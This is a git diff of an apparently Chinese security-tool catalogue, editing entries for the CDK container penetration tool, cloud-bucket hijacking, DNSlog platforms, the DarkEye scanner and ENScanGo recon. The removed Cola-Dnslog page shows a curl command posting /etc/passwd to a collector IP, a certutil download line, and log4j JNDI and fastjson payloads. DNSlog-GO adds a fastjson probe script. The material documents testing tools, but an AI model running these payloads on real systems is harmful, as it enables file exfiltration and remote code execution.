+|Persistence|Deploy Backdoor Pod|k8s-backdoor-daemonset|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-backdoor-daemonset)|
+|Persistence|Deploy Shadow K8s api-server|k8s-shadow-apiserver|✔||[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-shadow-apiserver)|
+|Persistence|K8s MITM Attack (CVE-2020-8554)|k8s-mitm-clusterip|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Evaluate:-k8s-mitm-clusterip)|
+|Persistence|Deploy K8s CronJob|k8s-cronjob|✔|✔|[link](https://github.com/cdk-team/CDK/wiki/Exploit:-k8s-cronjob)|
 
 **Note about Thin:** The **thin release** is prepared for short life container shells such as serverless functions. We add build tags in source code and cut a few exploits to get the binary lighter. The 2MB file contains 90% of CDK functions, also you can pick up useful exploits in CDK source code to build your own lightweight binary.
 
@@ -193,62 +162,66 @@ cdk ps
 |ps|Process Information|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ps)|
 |ifconfig|Network Information|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ifconfig)|
 |vi|Edit Files|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-vi)|
-|ectl|Unauthorized enumeration of ectd keys|✔||
 |kcurl|Request to K8s api-server|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-kcurl)|
 |dcurl|Request to Docker HTTP API|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-dcurl)|
 |ucurl|Request to Docker Unix Socket|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-ucurl)|
 |rcurl|Request to Docker Registry API|||
 |probe|IP/Port Scanning|✔|[link](https://github.com/cdk-team/CDK/wiki/Tool:-probe)|
 
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
+### Release Document
 
-- 2022-11-11 发布演示视频[404星链计划开源安全工具演示——CDK](https://www.bilibili.com/video/BV1DG4y1Z784/)
-- 2021-11-11 发布文章[《CDK:一款针对容器场景的多功能渗透工具》](https://mp.weixin.qq.com/s/fopvHFPAbbqtCE6SV9JerQ)
+If you want to know how we released a new version, how thin is produced, why we provide upx versions, what the differences between different versions about all, normal, thin, upx are, and how to choose specific CDK exploits and tools to compile an own release for yourself, please check the [Release Document](https://github.com/cdk-team/CDK/wiki/Release).
 
-## 最近更新
+## Developer Docs
+
+* [run test in container.](https://github.com/cdk-team/CDK/wiki/Run-Test)
+
+## Contributing to CDK
+
+First off, thanks for taking the time to contribute!
+
+By reporting any issue, ideas or PRs, your GitHub ID will be listed here.
+
+* https://github.com/cdk-team/CDK/blob/main/thanks.md
 
-#### [v1.5.2] - 2023-03-12
+#### Bug Reporting
 
-**更新**  
-- 支持 linux 环境下的不同容器运行时，如 containerd、runc、docker  
-- 修复shadow-apiserver匿名访问无效的issue，支持新版本的k8s，如 v1.23.1  
-- 添加迭代部分功能的消息提醒
+Bugs are tracked as [GitHub Issues](https://github.com/cdk-team/CDK/issues). Create an issue with the current CDK version, error msg and the environment. Describe the exact steps which reproduce the problem.
 
-#### [v1.5.0] - 2022-09-25
+#### Suggesting Enhancements
 
-**更新**  
-- 检查内核漏洞利用，使用 mzet-/linux-exploit-suggester  
-- 支持检查路径中的 setuid 文件  
-- 为功能列表添加增加红色高亮输出  
-- 支持两种新的格式化打印函数  
-- 优化 CDK banner 高亮输出
+Enhancement suggestions are tracked as [GitHub Discussions](https://github.com/cdk-team/CDK/discussions). You can publish any thoughts here to discuss with developers directly.
 
-#### [v1.4.0] - 2022-09-04
+#### Pull Requests
 
-**更新**  
-- 新增通过 cgroup release_agent 实现的 lxcfs-rw Exploit  
-- 为 lxcfs-rw/lxcfs-rw-cgroup 添加推荐信息  
-- 新增高亮显示所有的挂载信息
+Fix problems or maintain CDK's quality:
 
-#### [v1.3.0] - 2022-07-10
+* Describe the current CDK version, environment, problem and exact steps that reproduce the problem.
+* Running screenshots or logs before and after you fix the problem.
 
-**Exploits**  
-- 为 ParseCDKMain 添加单元测试  
-- 新增'Exploit container escape with kubelet log access & /var/log mount'  
-- 新增 kubelet 默认未授权访问利用(端口10250)  
+New feature or exploits:
 
-**Others**  
-- 在 github action 中新增了 go test  
-- 支持 linux 容器获取网关  
-- 更新文档，新增了 快速开始 章节  
-- 新增在 pods 中获取网关
+* Explain why this enhancement would be useful to other users.
+* Please enable a sustainable environment for us to review contributions.
+* Screenshots about how this new feature works.
+* If you are committing a new evaluate/exploit scripts, please add a simple doc to your PR message, here is an [example](https://github.com/cdk-team/CDK/wiki/Exploit:-docker-sock-deploy).
+
+<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
+## 项目相关
+
+
+## 最近更新
 
-#### [v1.2.0] - 2022-06-25
+#### [v1.0.4] - 2021-10-02
+**新增**  
+- k8s-psp-dump 漏洞利用添加 force-fuzz 选项  
+- lxcfs-rw 漏洞利用添加过滤器字符串  
+- 格式化 'run --list' 输出  
+- 添加 StringContains 函数  
+**修复**  
+- 修复 DeployBackdoorDaemonset 在出错时返回 true 的问题  
+- 修复 CapDacReadSearch Exploit 中的构建错误  
+- 修复 http 授权令牌在前缀或后缀中有空字符串  
 
-**更新**  
-- 新增 Exploit：从 etcd 获取 k8s 的 token  
-- 添加输出结束消息  
-- 移除 --insecure-port 参数
 
 <!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/Cloud-Bucket-Leak-Detection-Tools.md b/detail/Cloud-Bucket-Leak-Detection-Tools.md
deleted file mode 100644
index 8abced0f8..000000000
--- a/detail/Cloud-Bucket-Leak-Detection-Tools.md
+++ /dev/null
@@ -1,101 +0,0 @@
-## Cloud-Bucket-Leak-Detection-Tools <https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-UzJu-orange)
-![GitHub stars](https://img.shields.io/github/stars/UzJu/Cloud-Bucket-Leak-Detection-Tools.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.4.0-red)
-![Time](https://img.shields.io/badge/Join-20220829-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-```bash
-git clone https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools.git
-cd Cloud-Bucket-Leak-Detection-Tools/
-# 安装依赖 建议使用Python3.8以上的版本 我的版本: Python 3.9.13 (main, May 24 2022, 21:28:31)
-# 已经测试版本如下
-# 1、python3.8.9
-# 2、python3.9.13
-# 3、python3.7
-# 4、python3.6.15
-# 5、python3.9.6
-pip3 install -r requirements.txt
-python3 main.py -h
-```
-
-![image-20220716140707903](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716140707903.png)
-
-使用之前需要在`config/conf.py`文件配置自己对应的云厂商AK
-
-![image-20220716140934866](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716140934866.png)
-
-## 1、阿里云存储桶
-
-### 1.1、单个存储桶检测
-
-```bash
-python3 main.py -aliyun [存储桶URL]
-```
-
-![image-20220716141132931](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141132931.png)
-
-### 1.2、自动存储桶劫持
-
-当如果检测存储桶不存在时会自动劫持该存储桶
-
-![image-20220703202339058](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220703202339058.png)
-
-### 1.3、批量存储桶地址检测
-
-```bash
-# fofa语法
-domain="aliyuncs.com"
-server="AliyunOSS"domain="aliyuncs.com"
-```
-
-```bash
-# 使用-faliyun
-python3 main.py -faliyun url.txt
-```
-
-![image-20220716141356518](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141356518.png)
-
-## 2、腾讯云存储桶
-
-```bash
-python3 main.py -tcloud [存储桶地址]
-```
-
-![image-20220716141554856](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141554856.png)
-
-## 3、华为云存储桶
-
-```bash
-python3 main.py -hcloud [存储桶地址]
-```
-
-![image-20220716141948046](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716141948046.png)
-
-## 4、AWS存储桶
-
-```bash
-python3 main.py -aws [存储桶地址]
-```
-
-![image-20220716142431142](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142431142.png)
-
-## 5、扫描结果保存
-
-扫描结果会存放在`results`目录下
-
-![image-20220716142617997](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142617997.png)
-
-![image-20220716142641883](https://github.com/UzJu/Cloud-Bucket-Leak-Detection-Tools/raw/main/images/image-20220716142641883.png)
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/Cola-Dnslog.md b/detail/Cola-Dnslog.md
deleted file mode 100644
index e017715af..000000000
--- a/detail/Cola-Dnslog.md
+++ /dev/null
@@ -1,398 +0,0 @@
-## Cola-Dnslog <https://github.com/AbelChe/cola_dnslog>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Python-blue)
-![Author](https://img.shields.io/badge/Author-AbelChe-orange)
-![GitHub stars](https://img.shields.io/github/stars/AbelChe/cola_dnslog.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.1-red)
-![Time](https://img.shields.io/badge/Join-20220829-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-Cola Dnslog 是一款更加强大的dnslog平台（无回显漏洞探测辅助平台），
-
-- 完全开源
-- 支持dns http ldap rmi等协议
-- 提供API调用方式便于与其他工具结合
-- 支持钉钉机器人、Bark等提醒
-- 支持docker一键部署
-
-
-------
-
-涉及到技术、框架：
-
-`dns` `http` `ldap` `rmi` `webui` `vue-element-admin` `fastapi` `sqlite`
-
-可帮助检测漏洞：
-
-`log4j2` `fastjson` `ruoyi` `Spring` `RCE` `Blind SQL` `Bland XXE`
-
-特色：
-
-`Dingtalk Robot` `Bark` `API` `ldaplog` `rmilog` `Docker`
-
-## 🥯 使用方法
-
-> 假设你购买的域名为`example.com`
->
-> 你的vps ip为`1.1.1.1`
-
-### 域名
-
-请自行购买域名，并将域名的解析服务器托管至部署cola_dnslog的服务器
-
-以godaddy为例
-
-1. 配置域名解析处右上角三个点，点击Host Names
-
-![image-20220717175903352](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717175903352.png)
-
-2. 修改或新增主机名如下图所示，ip地址填写你的vps地址即可
-
-![image-20220717180002176](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717180002176.png)
-
-3. 回到dns管理，将域名服务器修改为`ns1.example.com`和`ns2.example.com`
-
-![image-20220717180242944](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220717180242944.png)
-
-### 安装部署
-
-> 因为一些国内网络众所周知的原因，大多数同学使用国内VPS都会卡在前端npm构建的时候，目前暂未找到更好的解决方案，建议使用国外或者网络畅通的VPS搭建。
->
-> 欢迎大家提issues!
-
-#### Docker（推荐）
-
-##### 一键启动（推荐）
-
-1. 下载源码
-
-```sh
-git clone https://github.com/Abelche/cola_dnslog.git
-cd cola_dnslog
-```
-
-2. 修改docker-compose.yml中environment变量
-
-```yml
-...
-  server:
-    ...
-    environment:
-      DNS_DOMAIN: example.com # 自己的域名
-      NS1_DOMAIN: ns1.example.com # ns1绑定
-      NS2_DOMAIN: ns2.example.com # ns2绑定
-      SERVER_IP: 1.1.1.1 # vps ip
-      HTTP_PORT: 80 # httplog服务端口
-      HTTP_RESPONSE_SERVER_VERSION: nginx # httplog返回头的服务端信息Server: nginx
-      LDAP_PORT: 1389 # ldaplog服务端口
-      RMI_PORT: 1099 # rmilog服务端口
-    ...
-  front:
-  	...
-    environment:
-      API_BASE_URL: 'http://1.1.1.1:28001' # http://vpsip:28001 / http://example.com:28001
-    ...
-
-```
-
-3. 启动
-
-```sh
-docker-compose up -d
-```
-
-4. 启动之后查看docker日志或者查看info.txt获取账号信息
-
-> server端程序运行会在程序根目录创建一个info.txt用于记录初始化的账号信息
-
-```sh
-docker-compose logs
-docker exec -it <container_id> cat /coladnslog/info.txt
-```
-
-![image-20220812005813825](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220812005813825.png)
-
-> 如果需要自定义端口，请修改`docker-compose.yml`的端口映射`ports`即可
-
-
-
-##### 前后端分离部署
-
-服务端：
-
-```sh
-git clone https://github.com/Abelche/cola_dnslog.git
-cd cola_dnslog
-
-docker build -t coladnslog_server -f Dockerfile_server .
-docker run -itd \
--e DNS_DOMAIN=example.com \
--e NS1_DOMAIN=ns1.example.com \
--e NS2_DOMAIN=ns2.example.com \
--e SERVER_IP=1.1.1.1 \
--e HTTP_PORT=80 \
--e HTTP_RESPONSE_SERVER_VERSION=nginx \
--e LDAP_PORT=1389 \
--e RMI_PORT=1099 \
---net=host \
---name ColaDnslog_server coladnslog_server
-```
-
-客户端：
-
-```sh
-git clone https://github.com/Abelche/cola_dnslog.git
-cd cola_dnslog
-
-sudo docker build --build-arg VERSION=v1.3.2 -t coladnslog_front -f Dockerfile_front .
-sudo docker run -itd \
--p 18080:80 \
--e "API_BASE_URL=http://1.2.3.4:28001" \
---name ColaDnslog_front coladnslog_front
-```
-
-
-
-#### 源码安装
-
-共分四步
-
-##### **第一步 下载源码**
-
-下载源码
-
-```sh
-git clone https://github.com/Abelche/cola_dnslog.git
-```
-
-> 我习惯于将服务用`tmux`放到后台运行
-
-##### **第二步 启动webserver**
-
-安装python（python>=3.7）依赖
-
-注意，需要用python3.7及以上版本，否则会有兼容性问题，多python推荐使用conda
-
-```sh
-cd cola_dnslog
-pip install -r requirements.txt
-```
-
-修改根目录下的`config.yaml`
-
-主要需要修改`DNS_DOMAIN` `NS1_DOMAIN` `NS2_DOMAIN` `SERVER_IP`
-
-可选: 修改`HTTP_RESPONSE_SERVER_VERSION`伪造http返回中Server字段
-
-```yaml
-global:
-  DB_FILENAME: sqlite.db
-
-logserver:
-  DNS_DOMAIN: example.com
-  NS1_DOMAIN: ns1.example.com
-  NS2_DOMAIN: ns2.example.com
-  SERVER_IP: 1.1.1.1
-  DNS_PORT: 53
-  HTTP_HOST: 0.0.0.0
-  HTTP_PORT: 80
-  HTTP_RESPONSE_SERVER_VERSION: nginx
-  LDAP_HOST: 0.0.0.0
-  LDAP_PORT: 1389
-  RMI_HOST: 0.0.0.0
-  RMI_PORT: 1099
-
-webserver:
-  HOST: 0.0.0.0
-  PORT: 28001
-  PASSWORD_SALT: 随便一长串字符串，如：cuau89j2iifdas8
-```
-
-启动webserber端和logserver端，注意这里一定要先启动webserver端（因为要先通过webserver端初始化数据库，初始化之后会在终端输出账号、密码、token、logid等信息。
-
-```sh
-chmod +x start_webserver
-./start_webserver
-```
-
-![image-20220730035846090](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730035846090.png)
-
-
-##### **第三步 启动logserver**(需要root权限)
-
-```sh
-chmod +x start_logserver
-sudo ./start_logserver
-```
-
-![image-20220730160132103](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220730160132103.png)
-
-
-##### **第四步 启动前端**
-
-现在来到前端（不一定要和webserver放在一起，你甚至可以通过electron打包成本地客户端），先修改配置文件`.env.production`
-
-```sh
-cd src/front
-vim .env.production
-```
-
-```ini
-# just a flag
-ENV = 'production'
-
-# base api
-VUE_APP_BASE_API = 'http://1.1.1.1:28001'
-
-TARGET_API = 'http://1.1.1.1:28001'
-```
-
-然后npm安装依赖、打包、启动http服务（这里可以随意选择http服务器，为了方便我直接用python启动）
-
-```sh
-cd src/front
-npm install
-npm run build:prod
-
-cd dist
-python3 -m http.server 18001
-```
-
-至此，三端（webserver端、logserver端、webui前端）已经全部开启！
-
-这时，访问http://1.1.1.1:18001应该可以看到登录页面！
-
-玩得开心！
-
-### 钉钉机器人
-
-在钉钉群新建机器人，安全设置：添加自定义关键词`coladnslog`
-
-![image-20220731231424000](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231424000.png)
-
-并获取到webhook的token，注意，只需要填写token即可
-
-![image-20220731231912885](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231912885.png)
-
-进入webui，修改Dingtalk Robot Token为上文获取的token，点击Update保存即可
-
-![image-20220802020311279](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802020311279.png)
-
-效果如下：
-
-<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom:33%;" />
-
-### Bark
-
-[Finb/Bark: Bark is an iOS App which allows you to push custom notifications to your iPhone (github.com)](https://github.com/Finb/Bark)
-
-[Finb/bark-server: Backend of Bark (github.com)](https://github.com/Finb/bark-server)
-
-同上 进入webui，开启Bark开关，然后修改bark url，点击Update保存
-
-![image-20220802015907678](https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015907678.png)
-
-效果如下：
-
-<img src="https://github.com/AbelChe/cola_dnslog/raw/main/readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" />
-
-### 如何使用
-
-上文提到，假定我的域名和ip是`example.com`和`1.1.1.1`，并且我们账户的logid为`qrq`
-
-#### DNS
-
-```sh
-nsloopup `whoami`.qrq.example.com
-ping `whoami`.qrq.example.com
-```
-
-#### HTTP
-
-```sh
-curl 1.1.1.1/qrq/some/info
-curl -d @/etc/passwd 1.1.1.1/qrq/postdata
-certutil -urlcache -split -f http://1.1.1.1/x x
-```
-
-#### LDAP
-
-log4j2 fastjson等可以使用此方法
-
-注意这里必须要令最后路径的最后作为logid，如：`ldapqrq` `xxxxqrq` `qrq` `xxx/qrq`
-
-```
-${jndi:ldap://1.1.1.1:1389/ldapqrq}
-{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://1.1.1.1:1389/ldapqrq", "autoCommit":true}
-```
-
-#### RMI
-
-同上，log4j2 fastjson等
-
-```
-${jndi:rmi://1.1.1.1:1099/rmiqrq}
-{ "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://1.1.1.1:1099/rmiqrq", "autoCommit":true } }
-```
-
-## 👀 概览
-
-### 登录
-
-![image-20220730151326711](readme_resource/image-20220730151326711.png)
-
-
-
-### 首页
-
-![image-20220731143149729](readme_resource/image-20220731143149729.png)
-
-
-
-### Dnslog
-
-![image-20230204200108337](readme_resource/image-20230204200108337.png)
-
-
-
-### Httplog
-
-![image-20230204200455783](readme_resource/image-20230204200455783.png)
-
-
-
-### Ldaplog
-
-![image-20230204201704004](readme_resource/image-20230204201704004.png)
-
-
-
-### Rmilog
-
-![image-20230204201750497](readme_resource/image-20230204201750497.png)
-
-
-
-### 账号信息
-
-![image-20220801003540673](readme_resource/image-20220801003540673.png)
-
-
-
-### 钉钉机器人
-
-<img src="readme_resource/image-20220731231301577.png" alt="image-20220731231301577" style="zoom: 25%;" />
-
-
-
-### Bark
-
-<img src="readme_resource/image-20220802015642879.png" alt="image-20220802015642879" style="zoom: 25%;" />
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/DNSlog-GO.md b/detail/DNSlog-GO.md
deleted file mode 100644
index a9ebb42b8..000000000
--- a/detail/DNSlog-GO.md
+++ /dev/null
@@ -1,134 +0,0 @@
-## DNSlog-GO <https://github.com/lanyi1998/DNSlog-GO>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-lanyi-orange)
-![GitHub stars](https://img.shields.io/github/stars/lanyi1998/DNSlog-GO.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V1.5.2-red)
-![Time](https://img.shields.io/badge/Join-20220316-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-
-DNSLog-GO 是一款golang编写的监控 DNS 解析记录的工具，自带多用户WEB界面
-
-演示截图:
-
-![avatar](https://github.com/lanyi1998/DNSlog-GO/raw/master/images/demo.png)
-
-安装
----
-
-详细图文教程:https://mp.weixin.qq.com/s/m_UXJa0imfOi721bkBpwFg
-
-# 1.获取发行版
-
-这里 https://github.com/lanyi1998/DNSlog-GO/releases 下载最新发行版,并解压
-
-# 2.域名与公网 IP 准备
-
-```
-搭建并使用 DNSLog，你需要拥有一个域名如(a.com),还需要有一个公网 IP 地址(如：1.1.1.1)
-    
-修改 a.com 的 NS 记录为 
-
-NS1.vpsip.NIP.IO
-NS2.vpsip.NIP.IO
-
-如 
-ns1.1.1.1.1.nip.io
-ns1.1.1.1.1.nip.io
-
-本步骤中，需要在域名提供商提供的页面进行设置，部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找一个支持修改 NS 记录为自己 NS 的域名提供商。
-    
-注意: NS 记录修改之后部分地区需要 24-48 小时会生效
-```
-
-# 3.修改配置文件 config.ini
-
-```
-HTTP:
-  port: 8000 //http web监听端口
-  #{"token":"用户对应子域名"}
-  user: { "admin": "admin" } //用户admin 对应的dnslog子域名是 admin.demo.com
-  consoleDisable: false  //是否关闭web页面
-Dns:
-  domain: demo.com //dnslog域名
-```
-
-# 4.启动对应系统的客户端
-
-**注意服务端重启以后，如果修改了用户对应子域名，必须清空一下浏览器中的localStorage,否则会获取不到数据**
-
----
-
-API Python Demo
-
-```python
-import requests
-import random
-import json
-
-
-class DnsLog():
-    domain = ""
-    token = ""
-    Webserver = ""
-
-    def __init__(self, Webserver, token):
-        self.Webserver = Webserver  # dnslog的http监听地址，格式为 ip:端口
-        self.token = token  # token
-        # 检测DNSLog服务器是否正常
-        try:
-            res = requests.post("http://" + Webserver + "/api/verifyToken", json={"token": token}).json()
-            self.domain = res.Msg
-        except:
-            exit("DnsLog 服务器连接失败")
-        if res["Msg"] == "false":
-            exit("DnsLog token 验证失败")
-
-    # 生成随机子域名
-    def randomSubDomain(self, length=5):
-        subDomain = ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', length)) + '.' + self.domain
-        return subDomain
-
-    # 验证子域名是否存在
-    def checkDomain(self, domain):
-        res = requests.post("http://" + self.Webserver + "/api/verifyDns", json={"Query": domain},
-                            headers={"token": self.token}).json()
-        if res["Msg"] == "false":
-            return False
-        else:
-            return True
-
-
-url = "http://192.168.41.2:8090/"
-
-dns = DnsLog("1111:8888", "admin")
-
-subDomain = dns.randomSubDomain()
-
-payload = {
-    "b": {
-        "@type": "java.net.Inet4Address",
-        "val": subDomain
-    }
-}
-
-requests.post(url, json=payload)
-
-if dns.checkDomain(subDomain):
-    print("存在FastJosn")
-```
-
-
-<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
-## 项目相关
-
-
-## 最近更新
-
-#### [v1.5.2] - 2022-06-08
-
-**更新**  
-- 通过配置文件，可固定每个用户对应的子域名。避免每次重启后，用户对应的子域名发生变动
-
-<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/DarkEye.md b/detail/DarkEye.md
new file mode 100644
index 000000000..a34363855
--- /dev/null
+++ b/detail/DarkEye.md
@@ -0,0 +1,94 @@
+## DarkEye <https://github.com/zsdevX/DarkEye>
+<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
+![Language](https://img.shields.io/badge/Language-Golang-blue)
+![Author](https://img.shields.io/badge/Author-zsdevX-orange)
+![GitHub stars](https://img.shields.io/github/stars/zsdevX/DarkEye.svg?style=flat&logo=github)
+![Version](https://img.shields.io/badge/Version-V4.3.0-red)
+![Time](https://img.shields.io/badge/Join-20210120-green)
+<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
+
+
+## 🚀快速使用 
+
+### 弱口令、指纹发现
+
+```bash
+df -ip 192.168.1.1-192.168.1.2
+扫描任务完成macdeMacBook-Pro:DarkEye mac$ ./dist/df_darwin_amd64 -ip 45.88.13.188 -website-domain-list www.hackdoor.org -port-list 80
+INFO[0000] 已加载1个IP,共计1个端口,启动每IP扫描端口线程数128,同时可同时检测IP数量32 
+INFO[0000] Plugins::netbios snmp postgres redis smb web memcached mssql mysql ftp mongodb ssh  
+
+Cracking...              100% [==================================================================================================================================================] (1/1, 13 it/min) 
+```
+
+### 网段发现
+
+```bash
+fiware-wilma:DarkEye mac$ ./dist/df_darwin_amd64 -ip 192.168.1.0-192.168.255.0  -only-alive-network
+当前为非管理权限模式，请切换管理员运行。
+如果不具备管理员权限需要设置原生的命令（例如：ping）检测。请设置命令参数：
+输入探测命令(default: ping -c 1 -W 1):
+输入探测的成功关键字(default: , 0.0%)
+输入命令shell环境(default: sh -c )
+
+使用命令Shell环境'sh -c '
+使用探测命令 'ping -c 1 -W 1'检查网络 
+使用关键字' , 0.0%' 确定网络是否存在
+192.168.1.0 is alive
+192.168.2.0 is died
+192.168.3.0 is died
+192.168.4.0 is died
+192.168.5.0 is died
+
+```
+
+### 主机发现
+
+```bash
+fiware-wilma:DarkEye mac$ ./dist/df_darwin_amd64 -ip 192.168.1.0-192.168.1.255 --alive-host-check
+当前为非管理权限模式，请切换管理员运行。
+如果不具备管理员权限需要设置原生的命令（例如：ping）检测。请设置命令参数：
+输入探测命令(default: ping -c 1 -W 1):
+输入探测的成功关键字(default: , 0.0%)
+输入命令shell环境(default: sh -c )
+
+使用命令Shell环境'sh -c '
+使用探测命令 'ping -c 1 -W 1'检查网络 
+使用关键字' , 0.0%' 确定网络是否存在
+192.168.1.1 is alive
+192.168.1.3 is alive
+192.168.1.0 is died
+
+```
+
+### 主机碰撞
+
+```bash
+./dist/df_darwin_amd64 -ip 192.168.1.0-192.168.1.255 -website-domain website.txt
+```
+
+## 支持平台
+
+```
+Windows、Linux、MacOs、Arm、Mips[el]、FreeBsd ...
+```
+
+
+## 🛠 编译安装
+
+```bash
+git clone https://github.com/b1gcat/DarkEye.git
+cd DarkEye
+go get -d -v ./...
+./build all
+
+Tips:编译好后文件都自动发布到dist目录下
+```
+
+<!--auto_detail_active_begin_e1c6fb434b6f0baf6912c7a1934f772b-->
+## 项目相关
+
+
+## 最近更新
+
+<!--auto_detail_active_end_f9cf7911015e9913b7e691a7a5878527-->
diff --git a/detail/ENScanGo.md b/detail/ENScanGo.md
deleted file mode 100644
index d56ab1879..000000000
--- a/detail/ENScanGo.md
+++ /dev/null
@@ -1,357 +0,0 @@
-## ENScanGo <https://github.com/wgpsec/ENScan_GO>
-<!--auto_detail_badge_begin_0b490ffb61b26b45de3ea5d7dd8a582e-->
-![Language](https://img.shields.io/badge/Language-Golang-blue)
-![Author](https://img.shields.io/badge/Author-wgpsec-orange)
-![GitHub stars](https://img.shields.io/github/stars/wgpsec/ENScan_GO.svg?style=flat&logo=github)
-![Version](https://img.shields.io/badge/Version-V0.0.15-red)
-![Time](https://img.shields.io/badge/Join-20221117-green)
-<!--auto_detail_badge_end_fef74f2d7ea73fcc43ff78e05b1e7451-->
-
-剑指HW/SRC，解决在HW/SRC场景下遇到的各种针对国内企业信息收集难题
-
-## 功能列表
-
-**使用程序可能导致账号被封，仅用于信息收集用途，请勿用于非法用途**
-
-**若该程序影响或侵犯到您的权益，请与我们联系**
-
-![ENScanGo](https://github.com/wgpsec/ENScan_GO/raw/master/README/ENScanGo.png)
-
- - 使用支持以下API，并支持合并数据导出
-    - 爱企查 (未登陆信息带*)
-    - 天眼查
-    - 阿拉丁
-    - 酷安市场
-    - 七麦数据
-    - 站长之家
-    - veryvp
- - 查询信息
-    - ICP备案
-    - APP
-    - 微博
-    - 微信公众号
-    - 控股公司
-    - 供应商
-    - 客户信息
-    - 小程序
-    - 控股X的公司的以上所有信息
-    - ...
- - 通过APK市场收集使用信息
-
-
-
-## 使用指南
-请直接前往RELEASE下载编译好的文件使用
-
-ENScanGo在第一次使用时需要使用 -v 命令 生成配置文件信息
-
-**遇到问题请加上参数 --debug 提issue**
-
-### 登陆配置
-
-Cookie信息请勿直接 `document.cookie`，可能因为http-only 选项无法复制全导致登陆失败
-
-![image-20221028223835307](https://github.com/wgpsec/ENScan_GO/raw/master/README/image-20221028223835307.png)
-
-**阿拉丁使用的是TOKEN**
-
-点击任意请求，拿到请求里的TOKEN
-
-![image-20230709132223242](https://github.com/wgpsec/ENScan_GO/raw/master/README/image-20230709132223242.png)
-
-**TYC tycid**
-
-配置COOKIE后配置tycid
-
-![image-20230722194839975](https://github.com/wgpsec/ENScan_GO/raw/master/README/image-20230722194839975.png)
-
-### 快速使用
-
-**默认公司信息** (网站备案, 微博, 微信公众号, app)
-
-```
-./enscan -n 小米
-```
-
-**对外投资占股100%的公司 获取孙公司（深度2）**
-
-```
-./enscan -n 小米 -invest 100 -deep 2
-```
-
-**组合筛选** 
-
-大于51%控股公司、供应商、分支机构，只要ICP备案信息，并且批量获取邮箱信息
-
-```
-./enscan -n 小米 -field icp --hold --supplier --branch --email 
-```
-
-**使用不同渠道** 
-
-使用天眼查数据源（或可设定为 all 组合多个数据源）
-
-```
-./enscan -n 小米 -type tyc
-```
-
-使用多数据源一起收集（暂不支持多渠道+筛选）
-
-```
